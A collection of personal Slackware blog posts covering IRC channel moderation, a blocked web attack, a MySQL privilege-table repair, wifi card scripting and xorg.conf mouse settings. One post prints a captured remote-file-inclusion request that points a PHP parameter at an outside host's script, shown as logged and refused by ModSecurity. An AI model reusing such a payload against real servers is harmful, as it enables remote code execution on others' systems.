Speaking of the channel, there has again been some ruckus about someone being banned 'unduly'. People have to recognize that moderating a channel does come at a price. One of these prices is the fact that people can't visit their frustrations on the channel. An individual visited the channel highly upset that Pat froze Slackware-current relating to issues with both the 2.4 and 2.6 kernel. Instead of following advice to follow up with Pat, he continues to vent on the channel, causing a rather heated flame war over something trivial. He was +q'd (meaning his speech was removed), but he evaded +q. He was then "removed" (meaning he was booted, not kicked, from the channel), but came back in the channel with the same attitude. He was then banned for 30 days. Anyone who evades moderation will automatically get a ban. Why 30 and not 7 days? Because, behind the scenes, in private message, the individual was very argumentive and I didn't feel like dealing with him 2 days later for the same offense. After reading the logs, someone had the gall to mention in the channel that the ban was unwarranted...this person thought that the individual was banned because of his views...WRONG. Read the channel guidelines. It states specifically that any +q/ban evasion will be dealt with in a rather harsh manner. Many people do not realize that the ops will never be able to please every single person's views in the channel. I've been doing this a LONG time (4+ years) and no matter if I just sit there and let the channel run itself or if I step in and boot someone, someone ALWAYS complains. It's a no-brainer for me: moderation is what it is. You can take it or leave it. There aren't too many channels on Freenode that aren't moderated. By nature, moderation pretty much means you can't state everything you feel, especially when it ruins the continuity of the channel chat. Is this an oxymoron, especially since Freenode is inhabited mostly by coders and free-thinkers? Every discussion, whether its in real-life in a conference or in someone's home or online on a forum or in a chat room/channel, will have some type of moderation. So, going forward, I'll not be including comments to the ban messages, as this adds confusion to why the person was banned. Really, the channel doesn't need to know why said person was banned after the fact. The ban messages are for the person being banned and it was designed that way by the people who set up the IRC specifications. If you want to know why someone was banned, speak with them directly or read the logs. I've no time to hold some lengthly dialog with someone who thinks that everyone should join an IRC channel and unload their frustrations. I try to think as objectively as possible on anything that goes on in the channel and to be quite honest, there's been a ton of bitching about the ops lately. When I see the non-ops quit pushing the ops' buttons, I'll take them more seriously and get more active in seeing to their needs...but the bellyaching has to stop first. Seriously, its usually the same people bitching about their rights being violated, and if its not the same people, there's usually some association.

2007-01-16T20:38:00.000-05:00

I saw someone hammering my web server today and yesterday. He/she generated 196 Snort alerts, which is quite a bit for my server. The cool thing is, there was negative response to the attack for two reasons:

1. The server doesn't use PHP or CGI and the attack was designed to exploit those two software packages.

2. I use ModSecurity, which is a web server application firewall.

See payload below (ModSecurity):

Request: midas.slackware.lan 198.145.244.232 - - [15/Jan/2007:21:04:18 -0500] "GET /calendar/index.php?inc_dir=http://200.75.9.114/C.php?&/ HTTP/1.1" 403 304 "-" "Morfeus Fucking Scanner" RawyokKgjR4AAFL7qwU "-"
----------------------------------------
GET /calendar/index.php?inc_dir=http://200.75.9.114/C.php?&/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-us
Connection: Close
Host: 66.160.141.30
User-Agent: Morfeus Fucking Scanner
mod_security-message: Access denied with code 403. Pattern match "index.php" at REQUEST_URI [id "1005"][rev
"2"] [msg "index.php usage, suspicious activity"] [severity "ALERT"]
mod_security-action: 403

HTTP/1.1 403 Forbidden
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

The activity triggered a rule I created (yeah, ModSecurity is rule-based). I know I don't use PHP but I'd still like to see such attacks on my network, as a heads-up to escalated attacks. What I don't have is a reactive firewall, one that blocks traffic such as this automatically. I had to add the IP to my block list by hand, which sucks.

ModSecurity also has a web-based console that I haven't figured out how to use yet, so I usually parse the flat logs manually then correlate any malicious traffic with my firewall and Snort logs to get a better picture of questionable activity. Once I figure out how to get the web-based console up and running, I'll let you know and maybe throw together a how-to for how to utilize ModSecurity on Slackware.

MySQL database corruption: fix

2006-12-28T01:07:00.000-05:00

When I upgraded my main tower to Slack v11.0, I had also upgraded MySQL to v5.0.24a (I don't know what version I was using before this). Soon after the upgrade, I noticed that I couldn't access my local PHPBB and PHPMyAdmin installs.

I was receiving the following error using the MySQL client:

bash-3.1$ mysql -u root -p
Enter password:
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)

The MySQL error logs looked like this:

061227 03:08:12 mysqld started
061227 3:08:12 [Warning] No argument was provided to --log-bin, and --log-bin-index was not used; so replication may break when this MySQL server acts as a master and has his hostname changed!! Please use '--log-bin=slackbox-bin' to avoid this problem.
061227 3:08:12 InnoDB: Started; log sequence number 0 4066534
061227 3:08:12 [Warning] Found invalid password for user: 'root @% '; Ignoring user
061227 3:08:12 [Note] /usr/libexec/mysqld: ready for connections.
Version: '5.0.24a-log' socket: '/tmp/mysql.sock' port: 0 Source distribution
061227 13:13:11 [Note] /usr/libexec/mysqld: Normal shutdown

Even after restarting the MySQL service, skipping grant tables, and reseting the password, the above still showed. So, I ran the following (after restarting the MySQL service using the init script):

bash-3.1$ mysql_fix_privilege_tables --verbose
This script updates all the mysql privilege tables to be usable by
MySQL 4.0 and above.

This is needed if you want to use the new GRANT functions,
CREATE AGGREGATE FUNCTION, stored procedures, or
more secure passwords in 4.1

You can safely ignore all 'Duplicate column' and 'Unknown column' errors
because these just mean that your tables are already up to date.
This script is safe to run even if your tables are already up to date!

ERROR 1060 (42S21) at line 22: Duplicate column name 'File_priv'
ERROR 1060 (42S21) at line 28: Duplicate column name 'Grant_priv'
ERROR 1060 (42S21) at line 29: Duplicate column name 'Grant_priv'
ERROR 1060 (42S21) at line 30: Duplicate column name 'Grant_priv'
ERROR 1060 (42S21) at line 41: Duplicate column name 'ssl_type'
ERROR 1146 (42S02) at line 67: Table 'mysql.procs_priv' doesn't exist
ERROR 1146 (42S02) at line 68: Table 'mysql.procs_priv' doesn't exist
ERROR 1146 (42S02) at line 70: Table 'mysql.procs_priv' doesn't exist
ERROR 1146 (42S02) at line 72: Table 'mysql.procs_priv' doesn't exist
ERROR 1054 (42S22) at line 94: Unknown column 'Type' in 'columns_priv'
ERROR 1060 (42S21) at line 100: Duplicate column name 'type'
ERROR 1060 (42S21) at line 110: Duplicate column name 'Show_db_priv'
ERROR 1060 (42S21) at line 127: Duplicate column name 'max_questions'
ERROR 1060 (42S21) at line 137: Duplicate column name 'Create_tmp_table_priv'
ERROR 1060 (42S21) at line 140: Duplicate column name 'Create_tmp_table_priv'
ERROR 1061 (42000) at line 145: Duplicate key name 'Grantor'
ERROR 1054 (42S22) at line 247: Unknown column 'Create_view_priv' in 'where clause'
ERROR 1054 (42S22) at line 277: Unknown column 'Create_routine_priv' in 'where clause'
ERROR 1054 (42S22) at line 313: Unknown column 'Create_user_priv' in 'where clause'
done
bash-3.1$

After that, I was able to access the databases using the root MySQL account:

bash-3.1$ mysql -u root
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: NO)
bash-3.1$ mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 2 to server version: 5.0.24a-log

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> quit
Bye
bash-3.1$

The issue? Apparently, there were three duplicates of the "Grant_priv" column, which I don't think was the REAL issue. Per the script notes, duplicates don't appear to break anything, but looking at where the script notes state, "This script updates all the mysql privilege tables to be usable by MySQL 4.0 and above," I wonder if that's all I needed to do (because I upgraded to a higher version).

I sometimes become so reliant upon PHPMyAdmin that I don't always know how to fix underlying issues. It looks like I'll be delving into MySQL commandline more often, just to understand MySQL at a base level before utilizing front-end tools, or at least reference PHPMyAdmin's SQL query statements a bit more (which is a very cool feature, as the front-end puts what its doing into commandline structure).

I'm betting some of you are wondering why I'm using PHPBB on my LAN. I use it as a note-taking tool. Whatever machine I'm on in my LAN, I can reference important notes or create notes that are in a central location. Even if I'm at work or at a coffee shop, I can tunnel into my LAN and view all my notes. The only thing I have to remember is to back up my databases religiously so I don't lose very important data that will hinder my work at home (and somewhat at my workplace). Yeah, I know that there may be better ways to take notes, but my notes sometimes tend to be lengthy and when I'm troubleshooting, it's easy to create a thread of trial-and-error posts so I can keep track of what I need to do, what I've already done, or what I shouldn't do. There aren't too many tools that can organize and store data like a CMS can. :)

Happy Holidays!!

Using a PCMCIA Wifi Card On Your Laptop - Closed-source Chipsets

2006-10-24T21:20:00.000-04:00

I've got my WPC54GS Linksys wifi card, which uses a closed-source chipset (Broadcom), working with Slackware 10.2 installed on a Dell Inspiron 8500. I've posted the process to get this working before at slackwiki.org.

I've scripted this process. You can grab the script from here. Edit it as you see fit. Many people actually use the tools that come with Slackware (the wireless configs in /etc/rc.d, I believe). I script my own, as I've many different wifi cards that I often swap out for different needs.

Anyways, give it a shot.

My next task is getting WPA working with the card (wpa_supplicant, I believe).

Ever Wonder How to Use A Mouse & Touchpad in X?

2006-10-24T20:57:00.000-04:00

I remember, awhile back, I got a USB mouse and touchpad working in X on my first laptop (using Suse). Many people still ask this question in ##slackware.

All you do is ensure you have the following within your xorg.conf file:

Section "ServerLayout"
Identifier "X.org Configured"
Screen 0 "Screen0" 0 0
InputDevice "Mouse0" "CorePointer"
InputDevice "Mouse1" "SendCoreEvents"
InputDevice "Keyboard0" "CoreKeyboard"

.
.
.

Section "InputDevice"
Identifier "Mouse0"
Driver "mouse"
Option "Protocol" "auto"
Option "Device" "/dev/mouse"
EndSection

Section "InputDevice"
Driver "mouse"
Identifier "Mouse1"
Option "Device" "/dev/input/mice"
Option "Name" "Autodetection"
Option "Protocol" "imps/2"
Option "Vendor" "Logitech"
EndSection

You'll notice that the bold print is the print that you have to add to your pre-existing configuration.

The whole file is here.

Give it a whirl...and good luck!